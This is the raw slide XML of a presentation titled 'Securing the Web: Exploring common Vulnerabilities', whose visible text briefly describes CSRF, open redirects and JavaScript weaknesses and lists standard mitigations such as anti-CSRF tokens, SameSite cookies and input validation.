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31FE9FD-8947-4ABC-BBC9-38F9C122A7A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FCC97D7-E9D8-441E-8B6C-3D5DDAF0836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97BD55A-123E-4D39-A45B-69FE89F8E46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5B522B1-FFD4-475C-8BFD-6396EFE3FAFB}"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D1EC847D-F248-4E33-98CE-02DB33139CC4}"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F239CC7-5795-40CB-A26A-FA6C7A22347D}"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D686937-0634-4740-8586-07388B53A9A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4F35545-35E5-40FE-BC4D-2C729B17810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991BE978-C9C8-4475-8DFE-B2DEE70663F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898BA80-B812-4604-9A39-A2045F8743B1}"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D6F36F2-AAC3-4906-AC5A-F93FA895E20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2366C8F-3248-4BC3-BF2F-343B3088C22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65BE0D1-E273-4D0F-9798-420B209D1A4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57BBBE4-C41C-4114-9B71-D9B978C04BD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3DF864E-B918-4755-B11D-BFE58A3FD02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DF1A8CA-EFA5-4F2B-9FF9-F5013043DA4F}"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C95519E-EEE2-4FCF-90BF-7B2E66CA76F3}"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27D87F2-B82B-4051-999F-52EFA0DC859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460D4AB-7367-4AF2-8FBC-CB1CF6BC4C9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4DEC7132-8AD6-4DD4-AD47-3263FE7C71B0}"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FBCFD43-3048-453D-A3FA-338BA3A2C00E}"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911E3D2-3DFC-48F1-A79F-12E71BFC9A4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E79397F-43B8-4B32-B481-70A8CB752BDA}"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814A8E2B-B9A1-4C2D-90E3-4E97438DCD7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DF95B26-13BF-4F34-A608-5C238F208263}"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F0CD8C9E-B431-4A26-B5FB-666310C0DEB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F4BCBEC-3330-4212-8D0C-B31A5EE9E36F}"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CE2E6EE-7DBC-470B-9BEB-9D531526F8E3}"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11308F9-A364-43DB-93A9-0B983520AC72}"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D86F9037-EDEB-48A4-AC4B-E58E738B6B69}"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0AF8A83-3488-4E2E-BE9A-73698978CF3F}"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EC7D279-BFDB-4E43-9877-2E74AA3E863E}"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1BD4848-B098-4C36-820D-9A90D732877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88A2FA-F061-4DB6-AF47-08420D415A1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9BFF321-F46B-4130-95CD-A3BD2E90BA8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B289477-3210-4DB0-92D7-D2E7A3933BD3}"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6280" y="5164200"/>
            <a:ext cx="3193200" cy="3884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 name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7225920" y="5164200"/>
            <a:ext cx="2345760" cy="3884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BACA4953-A6C3-4CF2-82FF-0F2B1EF09D9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2" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503640" y="5164200"/>
            <a:ext cx="2345760" cy="3884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6280" y="5164200"/>
            <a:ext cx="3193200" cy="3884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2" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7225920" y="5164200"/>
            <a:ext cx="2345760" cy="3884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4C343D83-CDAF-4470-8344-BB25C81BF773}"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43" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503640" y="5164200"/>
            <a:ext cx="2345760" cy="3884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6280" y="5164200"/>
            <a:ext cx="3193200" cy="3884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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7225920" y="5164200"/>
            <a:ext cx="2345760" cy="38844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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr indent="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{216C3995-B685-42CF-A51F-AC4A6D551F7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
        <p:nvSpPr>
          <p:cNvPr id="84" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503640" y="5164200"/>
            <a:ext cx="2345760" cy="38844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3640" y="225360"/>
            <a:ext cx="9324720" cy="1373400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en-US" sz="4800" spc="-1" strike="noStrike" u="dbl">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Securing the Web: Exploring common Vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1371600"/>
            <a:ext cx="8840160" cy="2325960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="102841" dir="2700000" blurRad="0" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="85000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="9600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="9600" spc="-1" strike="noStrike">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="f10d0c"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Nimbus Roman"/>
              </a:rPr>
              <a:t>WHOAMI???</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="9600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3932640"/>
            <a:ext cx="6170760" cy="114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3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Cantarell Extra Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Ojiambo Stephen,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> alias </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Cantarell Extra Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Sh4cker</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <mc:AlternateContent>
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000">
        <p:pull dir="d"/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow">
        <p:pull dir="d"/>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1" presetSubtype="3">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="123">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wheel(3)" transition="in">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="7" dur="1555"/>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8" presetSubtype="16">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="124">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="diamond(in)" transition="in">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="12" dur="10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nodeType="clickEffect" fill="hold" presetClass="entr" presetID="15">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="125">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="17" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="125">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="125">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="125">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav fmla="x+(cos(-2*pi*(1-$))*-x-sin(-2*pi*(1-$))*(1-y))*(1-$)" tm="0">
                                          <p:val>
                                            <p:strVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav fmla="x+(cos(-2*pi*(1-$))*-x-sin(-2*pi*(1-$))*(1-y))*(1-$)" tm="100000">
                                          <p:val>
                                            <p:strVal val="1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="125">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav fmla="y+(sin(-2*pi*(1-$))*-x+cos(-2*pi*(1-$))*(1-y))*(1-$)" tm="0">
                                          <p:val>
                                            <p:strVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav fmla="y+(sin(-2*pi*(1-$))*-x+cos(-2*pi*(1-$))*(1-y))*(1-$)" tm="100000">
                                          <p:val>
                                            <p:str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000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>CSRF – Cont...</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503640" y="1600200"/>
            <a:ext cx="9068760" cy="328572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Mitigation: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="648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Use a Anti-CSRF token – include unique tokens in forms or URLs that are validated on the server side before processing the request.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="648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Set the SameSite attribute on cookies to prevent cookies from being sent in cross-origin request.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="648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Validate the origin and the referrer headers to incoming request to ensure they match the expected of the web application.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="648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Advise users to log out of sensitive applications when not in use.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="18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Open HTTP Redirection</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146"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60000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="259200" indent="-1944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This allows attackers to craft malicious URLs that redirect users to harmful websites, exploiting the trust users have in legitimate sites to perform phishing attacks or redirect them to malicious content.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259200" indent="-194400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Mitigation: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="518400" indent="-194400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Input validation</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="518400" indent="-194400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Avoid dynamically constructing redirect URLs using user input.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="518400" indent="-194400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Encode redirect URLs to prevent injection of malicious characters or script.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="518400" indent="-194400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Implement strict HTTP response headers to restrict the origins to which the browser can be redirected.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="518400" indent="-194400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1134"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Educate users about the risks of following unverified links.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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JavaScript Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148"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69000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="298080" indent="-2235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Refers to security weaknesses in JavaScript code that can be exploited to compromise the security of a web application or its users.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="298080" indent="-2235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Mitigation: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1192320" indent="-149040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="567"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>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Thorough input validation.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1192320" indent="-149040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="567"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>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Output encoding.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1192320" indent="-149040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="567"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>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Secure session management.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1192320" indent="-149040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="567"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ffffff"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Symbol"/>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Keep JavaScript libraries and frameworks up to date with security patches.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3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9"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Questions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1371600"/>
            <a:ext cx="10080720" cy="365760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US" sz="4200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Open for any questions or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>clarifications.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4200" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="ffffff"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
